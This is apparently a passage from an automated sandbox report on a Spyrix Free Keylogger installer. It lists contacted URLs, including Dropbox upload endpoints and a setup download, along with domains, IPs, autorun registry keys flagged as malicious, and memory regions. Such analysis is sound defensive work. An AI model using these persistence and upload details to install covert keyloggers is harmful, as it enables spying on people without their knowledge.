http://www.spyrix.com/terms-of-use.php)
unknown
https://dashboard.spyrix.com/login
http://www.indyproject.org/Original
unknown
http://spyrix.com/manual.php
unknown
https://cdn.cdndownload.net/dashboard30/assets/Nunito-Bold-765bfff4.woff2
95.181.182.182
https://api-content.dropbox.com/1/files_put?
unknown
https://api.dropbox.com/1/shares/dropbox
unknown
HTTPS://DASHBOARD.SPYRIX.COM/
unknown
https://dashboard.spyrix.com/.spyrix.com/
unknown
https://api-content.dropbox.com/1/files/dropbox
unknown
https://api.dropbox.com/1/delta
unknown
http://www.actualkeylogger.com/help.html
unknown
https://dashboard.spyrix.com/
https://dashboard.spyrix.com/6s
unknown
https://cdn.cdndownload.net/dashboard30/assets/Modal-04ffda94.css
95.181.182.182
https://api-content.dropbox.com/1/files_put
unknown
https://www.spyrix.come
unknown
https://dashboard.spyrix.com
unknown
https://www.certum.pl/repository.0
unknown
https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.css
95.181.182.182
https://swtb-download.spyrix-sfk.com/do
unknown
https://dashboard.spyrix.com/favicon.ico
158.69.117.119
https://cdn.cdndownload.net/dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js
95.181.182.182
https://api.dropbox.com/1/oauth/request_token?
unknown
https://curl.haxx.se/docs/sslcerts.htmlcurl
unknown
https://cdn.cdndownload.net/dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js
95.181.182.182
http://rc.qzone.qq.com/qzonesoso/?search
unknown
https://spyrix.net/Uwas771wvshs7916gjqg62417/core.php
unknown
https://spyrix.net/das
unknown
https://api.dropbox.com/1/metadata/sandbox
unknown
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
unknown
https://spyrix.net/usr/monitor/access.txt
unknown
https://dashboard.clevercontrol.com/account/user-hash-gen
unknown
http://www.actualkeylogger.com/help.html#registrate
unknown
http://www.ok.ru/dk?st.cmd=searchResult
unknown
http://repository.certum.pl/l3.cer0
unknown
https://api.dropbox.com/1/fileops/create_folder
unknown
https://cdn.cdndownload.net/dashboard30/assets/Modal.module-d62c47b8.js
95.181.182.182
https://cdn.cdndownload.net/dashboard30/assets/Nunito-Regular-73dcaa51.woff2
95.181.182.182
https://cdn.cdndownload.net/dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js
95.181.182.182
http://html4/loose.dtd
unknown
https://api.dropbox.com/1/oauth/access_token
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
unknown
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s150
23.109.93.100
http://ocsp.certum.pl0.
unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
unknown
https://swtb-download.s
unknown
https://cdn.cdndownload.net/dashboard30/assets/en-08b2a987.js
95.181.182.182
http://neftali.clubdelphi.com/
unknown
http://www.actualkeylogger.com/help.html#registratehttp://www.spyrix.com/manual.php#registrateU
unknown
https://filedn.com
unknown
https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate.module-c837805f.js
95.181.182.182
https://api.dropbox.com/1/account/info?
unknown
https://api.dropbox.com/1/fileops/copy?
unknown
https://curl.haxx.se/docs/http-cookies.html
unknown
https://cdn.cdndownload.net/dashboard30/assets/Button-ca236c00.css
95.181.182.182
https://cdn.cdndownload.net/dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js
95.181.182.182
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
swtb-download.spyrix-sfk.com
167.114.14.168
spyrix.net
158.69.117.119
dashboard.spyrix.com
158.69.117.119
www.google.com
142.250.186.100
filedn.com
23.109.93.100
cl-e0469d03.edgecdn.ru
95.181.182.182
cdnbaynet.com
167.114.14.170
cdn.cdndownload.net
unknown

IPs

IP
Domain
Country
Malicious
192.168.2.5
unknown
unknown
167.114.14.168
swtb-download.spyrix-sfk.com
Canada
239.255.255.250
unknown
Reserved
158.69.117.119
spyrix.net
Canada
167.114.14.170
cdnbaynet.com
Canada
95.181.182.182
cl-e0469d03.edgecdn.ru
Russian Federation
142.250.186.100
www.google.com
United States
127.0.0.1
unknown
unknown
23.109.93.100
filedn.com
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
localSPM
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
localmon
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\404_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EnumKreg\value
tid
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
kbdsprt
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
localSPM
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: Setup Version
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: App Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
InstallLocation
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: Icon Group
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: User
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: Language
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
QuietUninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
NoModify
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
NoRepair
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
MajorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
MinorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
VersionMajor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
VersionMinor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
EstimatedSize
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
Version
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{FBF23B40-E3F0-101B-8488-00AA003E56F8} {000214E4-0000-0000-C000-000000000046} 0xFFFF
There are 38 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5F0000
remote allocation
page read and write
35AB000
heap
page read and write
33D0000
direct allocation
page read and write
A22000
heap
page read and write
7297000
heap
page read and write
2774000
trusted library allocation
page read and write
3A10000
direct allocation
page execute and read and write
8D8E000
stack
page read and write
677A000
heap
page read and write
100000
heap
page read and write
544000
heap
page read and write
3A40000
direct allocation
page execute and read and write
2ED0000
heap
page read and write
2650000
heap
page read and write
7FE00000
direct allocation
page read and write
28FB000
heap
page read and write
4160000
direct allocation
page execute and read and write
92D0000
heap
page read and write
8C7000
heap
page read and write
5650000
heap
page read and write
2D60000
heap
page read and write
212E000
stack
page read and write
544000
heap
page read and write
1CD0000
heap
page read and write
81B0000
trusted library allocation
page read and write
5D0000
heap
page read and write
544000
heap
page read and write
6E7000
heap
page read and write
C0C000
heap
page read and write
76EF000
direct allocation
page read and write
34C4000
heap
page read and write
32C2000
direct allocation
page read and write
7160000
trusted library allocation
page read and write
37FF000
stack
page read and write
4DE000
stack
page read and write
4070000
direct allocation
page execute and read and write
26AC000
direct allocation
page read and write
42F0000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
2D40000
heap
page read and write
9B000
stack
page read and write
2E9E000
stack
page read and write
1C6000
heap
page read and write
71C7000
heap
page read and write
6E2000
heap
page read and write
4B8E000
stack
page read and write
2940000
heap
page read and write
30DB000
heap
page read and write
78D0000
trusted library allocation
page read and write
7228000
heap
page read and write
419000
unkown
page write copy
7FF000
heap
page read and write
35C0000
direct allocation
page execute and read and write
2DCC000
stack
page read and write
8E3000
heap
page read and write
3A4000
heap
page read and write
6781000
heap
page read and write
104E000
unkown
page write copy
37F0000
direct allocation
page execute and read and write
78D0000
trusted library allocation
page read and write
C97000
trusted library allocation
page execute and read and write
35AB000
heap
page read and write
CBC000
heap
page read and write
73B2000
heap
page read and write
4C50000
heap
page read and write
9050000
trusted library allocation
page read and write
2F29000
heap
page read and write
6787000
heap
page read and write
CD7000
heap
page read and write
7E20000
trusted library allocation
page read and write
3BB000
stack
page read and write
2697000
direct allocation
page read and write
7190000
trusted library allocation
page read and write
5FD000
stack
page read and write
6ED000
heap
page read and write
4170000
direct allocation
page execute and read and write
3330000
direct allocation
page execute and read and write
C29000
heap
page read and write
41E0000
direct allocation
page execute and read and write
544000
heap
page read and write
2B80000
heap
page read and write
400000
unkown
page readonly
DC1000
unkown
page execute read
34C4000
heap
page read and write
544000
heap
page read and write
7160000
trusted library allocation
page read and write
4BF2000
trusted library allocation
page read and write
4EAB000
stack
page read and write
8130000
trusted library allocation
page read and write
2F25000
heap
page read and write
CD0000
heap
page read and write
104E000
unkown
page write copy
3FF0000
direct allocation
page execute and read and write
2F36000
heap
page read and write
642000
heap
page read and write
544000
heap
page read and write
81C5000
trusted library allocation
page read and write
4220000
direct allocation
page execute and read and write
88E000
heap
page read and write
C4E000
stack
page read and write
21C0000
direct allocation
page read and write
918000
heap
page read and write
745B000
heap
page read and write
9E8000
heap
page read and write
33B0000
direct allocation
page execute and read and write
CD9000
heap
page read and write
7429000
heap
page read and write
341C000
direct allocation
page read and write
9E0000
heap
page read and write
30C8000
heap
page read and write
91E000
stack
page read and write
DC0000
unkown
page readonly
92F000
stack
page read and write
4C00000
trusted library allocation
page execute and read and write
1E0000
heap
page read and write
383E000
stack
page read and write
544000
heap
page read and write
338F000
stack
page read and write
8130000
trusted library allocation
page read and write
2BEC000
stack
page read and write
81B0000
trusted library allocation
page read and write
21B0000
heap
page read and write
544000
heap
page read and write
484D000
stack
page read and write
CD0000
heap
page read and write
3B50000
direct allocation
page execute and read and write
C9B000
trusted library allocation
page execute and read and write
2F18000
heap
page read and write
8C9000
heap
page read and write
950E000
stack
page read and write
1740000
heap
page read and write
4440000
direct allocation
page execute and read and write
358C000
heap
page read and write
316F000
stack
page read and write
CBD000
heap
page read and write
34C4000
heap
page read and write
539F000
stack
page read and write
334E000
stack
page read and write
4C40000
heap
page read and write
2770000
heap
page read and write
27C5000
heap
page read and write
2F5E000
stack
page read and write
544000
heap
page read and write
544000
heap
page read and write
1878000
heap
page read and write
22BF000
direct allocation
page read and write
3D10000
direct allocation
page execute and read and write
91B000
heap
page read and write
36F1000
direct allocation
page read and write
3A4000
heap
page read and write
393F000
stack
page read and write
2F9F000
stack
page read and write
3230000
heap
page read and write
CA1000
heap
page read and write
2795000
heap
page read and write
278B000
heap
page read and write
7FF000
heap
page read and write
4B0000
heap
page read and write
BDA000
heap
page read and write
72B0000
trusted library allocation
page read and write
227B000
direct allocation
page read and write
505D000
direct allocation
page read and write
3325000
direct allocation
page read and write
4300000
direct allocation
page execute and read and write
104E000
unkown
page read and write
1484000
unkown
page execute and read and write
81CE000
trusted library allocation
page read and write
71BA000
heap
page read and write
9CE000
stack
page read and write
2D10000
heap
page read and write
3D00000
direct allocation
page execute and read and write
34C4000
heap
page read and write
8130000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
57CD000
heap
page read and write
41C000
unkown
page readonly
51F0000
trusted library allocation
page read and write
460000
heap
page read and write
295D000
stack
page read and write
264E000
stack
page read and write
71B6000
heap
page read and write
36E3000
direct allocation
page read and write
C2B000
heap
page read and write
3EE000
stack
page read and write
863000
unkown
page execute and read and write
33C5000
heap
page read and write
548000
heap
page read and write
27A0000
heap
page read and write
35A5000
heap
page read and write
7450000
heap
page read and write
8B5000
heap
page read and write
8790000
trusted library allocation
page read and write
DC0000
unkown
page readonly
76E000
stack
page read and write
71BA000
heap
page read and write
275D000
trusted library allocation
page read and write
CA1000
heap
page read and write
620000
heap
page read and write
97000
stack
page read and write
544000
heap
page read and write
C6D000
trusted library allocation
page execute and read and write
7FDE0000
direct allocation
page read and write
2F41000
heap
page read and write
24EB000
stack
page read and write
34C4000
heap
page read and write
22E0000
direct allocation
page read and write
3000000
heap
page read and write
78D0000
trusted library allocation
page read and write
3A4000
heap
page read and write
33C0000
heap
page read and write
71D6000
heap
page read and write
544000
heap
page read and write
8130000
trusted library allocation
page read and write
2F3F000
heap
page read and write
544000
heap
page read and write
33F7000
direct allocation
page read and write
CD5000
heap
page read and write
3880000
direct allocation
page execute and read and write
8E9000
heap
page read and write
2F39000
heap
page read and write
C50000
heap
page read and write
2F3B000
heap
page read and write
7D2000
heap
page read and write
8130000
trusted library allocation
page read and write
277C000
heap
page read and write
8130000
trusted library allocation
page read and write
7443000
heap
page read and write
2130000
direct allocation
page read and write
8B5000
heap
page read and write
9E3000
heap
page read and write
7061000
heap
page read and write
3D60000
direct allocation
page execute and read and write
C80000
heap
page read and write
35B0000
heap
page read and write
4930000
heap
page read and write
2D6B000
heap
page read and write
741D000
heap
page read and write
104E000
unkown
page write copy
2E50000
heap
page read and write
2C80000
heap
page read and write
2321000
direct allocation
page read and write
359B000
heap
page read and write
3F20000
direct allocation
page execute and read and write
648000
heap
page read and write
38E0000
direct allocation
page execute and read and write
4190000
direct allocation
page execute and read and write
2D62000
heap
page read and write
2423000
heap
page read and write
2B43000
heap
page read and write
8130000
trusted library allocation
page read and write
3449000
direct allocation
page read and write
274F000
stack
page read and write
225A000
direct allocation
page read and write
3860000
direct allocation
page execute and read and write
2C70000
heap
page read and write
414E000
stack
page read and write
1116000
unkown
page write copy
26D7000
direct allocation
page read and write
71C6000
heap
page read and write
3A4000
heap
page read and write
8130000
trusted library allocation
page read and write
36F0000
heap
page read and write
5B3000
unkown
page read and write
1117000
unkown
page write copy
3DD0000
direct allocation
page execute and read and write
2F39000
heap
page read and write
BF1000
heap
page read and write
3E00000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
8EC000
heap
page read and write
313C000
stack
page read and write
32F0000
direct allocation
page read and write
2F38000
heap
page read and write
638000
heap
page read and write
178E000
heap
page read and write
72B0000
trusted library allocation
page read and write
CCC000
heap
page read and write
36C6000
direct allocation
page read and write
900000
heap
page read and write
2BBA000
heap
page read and write
57E0000
heap
page read and write
71B7000
heap
page read and write
3DF0000
direct allocation
page execute and read and write
5053000
heap
page read and write
2520000
direct allocation
page read and write
111A000
unkown
page write copy
3C10000
direct allocation
page execute and read and write
C60000
trusted library allocation
page read and write
3740000
direct allocation
page execute and read and write
2EA0000
heap
page read and write
A2A000
heap
page read and write
722B000
heap
page read and write
550000
heap
page read and write
33A7000
direct allocation
page execute and read and write
C25000
heap
page read and write
45C3000
direct allocation
page read and write
A60000
heap
page read and write
908E000
stack
page read and write
8130000
trusted library allocation
page read and write
6640000
direct allocation
page execute and read and write
17CE000
heap
page read and write
7493000
heap
page read and write
8130000
trusted library allocation
page read and write
CD4000
heap
page read and write
2F0E000
stack
page read and write
7EA000
heap
page read and write
71B0000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
A20000
heap
page read and write
CDA000
heap
page read and write
3F80000
direct allocation
page execute and read and write
2BF0000
heap
page read and write
111B000
unkown
page readonly
2ECE000
stack
page read and write
57E6000
heap
page read and write
5B8000
heap
page read and write
9D0000
heap
page read and write
2236000
direct allocation
page read and write
70E000
stack
page read and write
91E000
heap
page read and write
CD5000
heap
page read and write
490000
heap
page read and write
111A000
unkown
page write copy
3D70000
direct allocation
page execute and read and write
73C000
heap
page read and write
1864000
heap
page read and write
61E01000
unkown
page execute read
DC0000
unkown
page readonly
74AD000
heap
page read and write
A86000
unkown
page execute and write copy
8F7000
heap
page read and write
223D000
direct allocation
page read and write
34C4000
heap
page read and write
44CC000
direct allocation
page read and write
745B000
heap
page read and write
2795000
heap
page read and write
8D4E000
stack
page read and write
2799000
heap
page read and write
2F26000
heap
page read and write
261E000
stack
page read and write
2219000
direct allocation
page read and write
3540000
heap
page read and write
544000
heap
page read and write
7FD88000
direct allocation
page read and write
7FD0E000
direct allocation
page read and write
CCA000
heap
page read and write
52BF000
stack
page read and write
7FDDE000
direct allocation
page read and write
30E2000
heap
page read and write
2B4E000
heap
page read and write
3A50000
direct allocation
page execute and read and write
502000
unkown
page write copy
181AB870000
heap
page read and write
3A20000
direct allocation
page execute and read and write
5B0000
heap
page read and write
3500000
direct allocation
page execute and read and write
71C6000
heap
page read and write
1AAE000
stack
page read and write
28F7000
heap
page read and write
2D20000
heap
page read and write
7B4F000
stack
page read and write
544000
heap
page read and write
960000
heap
page read and write
544000
heap
page read and write
28F0000
heap
page read and write
2D5A000
heap
page read and write
510F000
stack
page read and write
3FE0000
direct allocation
page execute and read and write
2795000
heap
page read and write
211BCEC000
stack
page read and write
8790000
trusted library allocation
page read and write
2C30000
heap
page read and write
8F4000
heap
page read and write
34E0000
direct allocation
page execute and read and write
6777000
heap
page read and write
AAB000
heap
page read and write
CDB000
heap
page read and write
176E000
stack
page read and write
28DD000
stack
page read and write
8C4C000
stack
page read and write
43F0000
direct allocation
page execute and read and write
21E0000
heap
page read and write
307E000
stack
page read and write
17BF000
heap
page read and write
8E8000
unkown
page execute and read and write
40A0000
direct allocation
page execute and read and write
7CE000
stack
page read and write
544000
heap
page read and write
2291000
direct allocation
page read and write
4B0E000
stack
page read and write
24E0000
direct allocation
page read and write
34C5000
heap
page read and write
8130000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
7447000
heap
page read and write
8130000
trusted library allocation
page read and write
773C000
direct allocation
page read and write
278B000
heap
page read and write
722000
heap
page read and write
4BE0000
heap
page read and write
50CE000
stack
page read and write
1111000
unkown
page read and write
8130000
trusted library allocation
page read and write
BF2000
heap
page read and write
544000
heap
page read and write
CD0000
heap
page read and write
32BB000
direct allocation
page read and write
7E6000
heap
page read and write
26C2000
direct allocation
page read and write
303C000
stack
page read and write
7184000
trusted library allocation
page read and write
C85000
heap
page read and write
2795000
heap
page read and write
BE0000
heap
page read and write
269E000
direct allocation
page read and write
2CCE000
stack
page read and write
888000
unkown
page execute and write copy
2F94000
heap
page read and write
274D000
trusted library allocation
page read and write
37A0000
direct allocation
page execute and read and write
544000
heap
page read and write
27BD000
stack
page read and write
50D000
unkown
page read and write
2F16000
heap
page read and write
3A4000
heap
page read and write
745F000
heap
page read and write
CA1000
heap
page read and write
278B000
heap
page read and write
2795000
heap
page read and write
8130000
trusted library allocation
page read and write
1630000
heap
page read and write
3A4000
heap
page read and write
3F70000
direct allocation
page execute and read and write
3090000
heap
page read and write
544000
heap
page read and write
3100000
heap
page read and write
438000
stack
page read and write
2A80000
heap
page read and write
2794000
trusted library allocation
page read and write
451B000
direct allocation
page read and write
2F14000
heap
page read and write
4D7F000
stack
page read and write
43C0000
direct allocation
page execute and read and write
4A4F000
stack
page read and write
2F10000
heap
page read and write
CA1000
heap
page read and write
717000
heap
page read and write
3570000
direct allocation
page execute and read and write
44A0000
direct allocation
page read and write
66E000
stack
page read and write
458B000
direct allocation
page read and write
CCC000
heap
page read and write
186E000
stack
page read and write
678A000
heap
page read and write
1052000
unkown
page readonly
1052000
unkown
page readonly
7FE43000
direct allocation
page read and write
34D5000
heap
page read and write
22A9000
direct allocation
page read and write
358D000
heap
page read and write
6ED000
heap
page read and write
41F0000
direct allocation
page execute and read and write
111A000
unkown
page write copy
8B5000
heap
page read and write
725000
heap
page read and write
3A4000
heap
page read and write
3520000
direct allocation
page execute and read and write
921000
heap
page read and write
344D000
direct allocation
page read and write
887000
heap
page read and write
6E2000
heap
page read and write
663E000
direct allocation
page read and write
3340000
direct allocation
page execute and read and write
4BDE000
stack
page read and write
895000
heap
page read and write
A10000
heap
page read and write
3313000
direct allocation
page read and write
6F3000
heap
page read and write
7182000
trusted library allocation
page read and write
2BDE000
stack
page read and write
7374000
heap
page read and write
2420000
heap
page read and write
2761000
heap
page read and write
C25000
heap
page read and write
40E0000
direct allocation
page execute and read and write
7400000
heap
page read and write
A40000
heap
page read and write
178B000
heap
page read and write
1F0000
heap
page read and write
35A5000
heap
page read and write
902000
heap
page read and write
4623000
direct allocation
page read and write
1111000
unkown
page read and write
42A0000
direct allocation
page execute and read and write
C25000
heap
page read and write
8A3E000
stack
page read and write
2220000
direct allocation
page read and write
34C4000
heap
page read and write
544000
heap
page read and write
8130000
trusted library allocation
page read and write
2F5E000
stack
page read and write
7174000
trusted library allocation
page read and write
2AED000
stack
page read and write
70CF000
stack
page read and write
3A4000
heap
page read and write
2D5A000
heap
page read and write
7FE11000
direct allocation
page read and write
71D7000
heap
page read and write
2750000
heap
page read and write
544000
heap
page read and write
4BFE000
stack
page read and write
3331000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
513000
unkown
page readonly
544000
heap
page read and write
26C9000
direct allocation
page read and write
8D4000
heap
page read and write
34C4000
heap
page read and write
73BE000
heap
page read and write
CE0000
heap
page read and write
568E000
heap
page read and write
42C0000
direct allocation
page execute and read and write
6F5000
heap
page read and write
8130000
trusted library allocation
page read and write
81B0000
trusted library allocation
page read and write
43A0000
direct allocation
page execute and read and write
17E2000
heap
page read and write
1ED000
stack
page read and write
4410000
direct allocation
page execute and read and write
4A70000
heap
page read and write
8130000
trusted library allocation
page read and write
111B000
unkown
page readonly
70F000
heap
page read and write
3C70000
direct allocation
page execute and read and write
2328000
direct allocation
page read and write
6D1000
heap
page read and write
1116000
unkown
page read and write
544000
heap
page read and write
7FE3C000
direct allocation
page read and write
71C2000
heap
page read and write
705000
heap
page read and write
7FC10000
direct allocation
page read and write
81B0000
trusted library allocation
page read and write
22FD000
direct allocation
page read and write
544000
heap
page read and write
1856000
heap
page read and write
71C0000
heap
page read and write
1878000
heap
page read and write
925000
unkown
page execute and read and write
3436000
direct allocation
page read and write
26B1000
trusted library allocation
page read and write
49BF000
stack
page read and write
1FA64B10000
heap
page read and write
1AD000
stack
page read and write
53C000
stack
page read and write
3A4000
heap
page read and write
2795000
heap
page read and write
8D1000
heap
page read and write
2D30000
heap
page read and write
2D5E000
heap
page read and write
1F8000
heap
page read and write
3970000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
722E000
heap
page read and write
24AE000
stack
page read and write
3A4000
heap
page read and write
2161000
direct allocation
page read and write
26B4000
direct allocation
page read and write
8790000
trusted library allocation
page read and write
1E0000
heap
page read and write
61E9E000
unkown
page write copy
CBC000
heap
page read and write
7190000
trusted library allocation
page read and write
226B000
direct allocation
page read and write
1111000
unkown
page read and write
7EB000
heap
page read and write
40F0000
direct allocation
page execute and read and write
3DC0000
direct allocation
page execute and read and write
2670000
trusted library allocation
page read and write
3E90000
direct allocation
page execute and read and write
540000
heap
page read and write
3580000
direct allocation
page execute and read and write
3790000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
7E20000
trusted library allocation
page read and write
22F6000
direct allocation
page read and write
6B4C000
stack
page read and write
DC0000
unkown
page readonly
2E26000
heap
page read and write
3A4000
heap
page read and write
4EA0000
direct allocation
page read and write
7F7C000
stack
page read and write
44A0000
direct allocation
page read and write
2C3E000
stack
page read and write
A1AE000
stack
page read and write
2F27000
heap
page read and write
728C000
stack
page read and write
3B20000
direct allocation
page execute and read and write
36B1000
trusted library allocation
page read and write
2690000
trusted library allocation
page read and write
3550000
heap
page read and write
8E8E000
stack
page read and write
6C7000
heap
page read and write
3A4000
heap
page read and write
35A5000
heap
page read and write
5E0000
heap
page read and write
3A4000
heap
page read and write
4090000
direct allocation
page execute and read and write
267F000
stack
page read and write
35E0000
direct allocation
page execute and read and write
6E2E000
stack
page read and write
318E000
stack
page read and write
1116000
unkown
page write copy
1FA64A50000
heap
page read and write
1DB5000
heap
page read and write
3530000
direct allocation
page execute and read and write
6EE000
heap
page read and write
4050000
heap
page read and write
34C4000
heap
page read and write
86D0000
trusted library allocation
page read and write
2289000
direct allocation
page read and write
4E4F000
stack
page read and write
29DC000
stack
page read and write
9FD000
stack
page read and write
2F30000
heap
page read and write
3050000
heap
page read and write
996000
heap
page read and write
32F3000
direct allocation
page read and write
35A5000
heap
page read and write
8FE000
stack
page read and write
29AE000
stack
page read and write
8ECE000
stack
page read and write
8130000
trusted library allocation
page read and write
33A4000
direct allocation
page execute and read and write
7225000
heap
page read and write
6771000
heap
page read and write
133F000
stack
page read and write
172E000
stack
page read and write
2D29000
heap
page read and write
544000
heap
page read and write
5E6000
unkown
page readonly
2285000
direct allocation
page read and write
770000
heap
page read and write
AD4000
heap
page read and write
635000
heap
page read and write
544000
heap
page read and write
9EA000
unkown
page execute and read and write
181AB994000
heap
page read and write
4F0E000
stack
page read and write
3BD0000
direct allocation
page execute and read and write
4150000
direct allocation
page execute and read and write
2DB0000
heap
page read and write
222F000
direct allocation
page read and write
544000
heap
page read and write
11CC000
stack
page read and write
8130000
trusted library allocation
page read and write
7FD90000
direct allocation
page read and write
CA2000
heap
page read and write
8DD000
stack
page read and write
7FE20000
direct allocation
page read and write
580000
heap
page read and write
3A60000
direct allocation
page execute and read and write
704000
heap
page read and write
61E89000
unkown
page read and write
3830000
direct allocation
page execute and read and write
C86000
trusted library allocation
page execute and read and write
27C0000
heap
page read and write
2DF6000
heap
page read and write
81B0000
trusted library allocation
page read and write
CD0000
heap
page read and write
917000
heap
page read and write
4750000
heap
page read and write
3A4000
heap
page read and write
2F3A000
heap
page read and write
2685000
